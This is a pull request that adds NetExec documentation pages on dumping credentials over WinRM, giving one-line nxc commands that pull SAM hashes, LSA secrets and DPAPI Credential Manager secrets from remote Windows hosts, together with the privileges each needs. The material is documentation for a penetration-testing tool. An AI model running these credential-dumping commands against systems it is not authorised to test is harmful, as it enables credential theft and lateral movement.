### PR TITLE
Add documentation for new winrm dpapi feature

### DIFF
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -128,6 +128,10 @@
 * [Authentication](winrm-protocol/authentication.md)
 * [Command Execution](winrm-protocol/command-execution.md)
 * [Defeating LAPS](winrm-protocol/defeating-laps.md)
+* [Obtaining Credentials](winrm-protocol/obtaining-credentials/README.md)
+  * [Dump SAM](winrm-protocol/obtaining-credentials/dump-sam.md)
+  * [Dump LSA](winrm-protocol/obtaining-credentials/dump-lsa.md)
+  * [Dump DPAPI](winrm-protocol/obtaining-credentials/dump-dpapi.md)
 
 ## MSSQL protocol
 

--- a/winrm-protocol/obtaining-credentials/README.md
+++ b/winrm-protocol/obtaining-credentials/README.md
@@ -1,0 +1,16 @@
+# Obtaining Credentials
+
+The following examples use a username and plaintext password, although user/hash combos work as well.
+
+{% content-ref url="dump-sam.md" %}
+[dump-sam.md](dump-sam.md)
+{% endcontent-ref %}
+
+{% content-ref url="dump-lsa.md" %}
+[dump-lsa.md](dump-lsa.md)
+{% endcontent-ref %}
+
+{% content-ref url="dump-dpapi.md" %}
+[dump-dpapi.md](dump-dpapi.md)
+{% endcontent-ref %}
+

--- a/winrm-protocol/obtaining-credentials/dump-dpapi.md
+++ b/winrm-protocol/obtaining-credentials/dump-dpapi.md
@@ -1,0 +1,13 @@
+---
+description: Dump DPAPI credentials using NetExec
+---
+
+# Dump DPAPI
+
+You can dump Credential Manager secrets for the connecting user with the following option: `--dpapi`.
+Admin rights not needed.
+
+```bash
+nxc winrm <ip> -u user -p password --dpapi
+```
+

--- a/winrm-protocol/obtaining-credentials/dump-lsa.md
+++ b/winrm-protocol/obtaining-credentials/dump-lsa.md
@@ -1,0 +1,13 @@
+# Dump LSA
+
+### Dump LSA secrets 
+Extracts and downloads SECURITY registry hive, and uses secretsdump.py methods locally to dump secrets
+
+{% hint style="danger" %}
+Requires Domain Admin or Local Admin Priviledges on target Domain Controller
+{% endhint %}
+
+```bash
+nxc winrm 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --lsa
+```
+

--- a/winrm-protocol/obtaining-credentials/dump-sam.md
+++ b/winrm-protocol/obtaining-credentials/dump-sam.md
@@ -1,0 +1,13 @@
+# Dump SAM
+
+### Dump SAM hashes
+Extracts and downloads SAM registry hive, and uses secretsdump.py methods locally to dump hashes
+
+{% hint style="warning" %}
+You need at least local admin privilege on the remote target, use option **--local-auth** if your user is a local account
+{% endhint %}
+
+```bash
+nxc winrm 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam
+```
+


### PR DESCRIPTION
Adding documentation to accompany NetExec PR: https://github.com/Pennyw0rth/NetExec/pull/768

Took the liberty of adding entries for SAM and LSA methods of obtaining credentials with winrm protocol, organised under folder as in smb.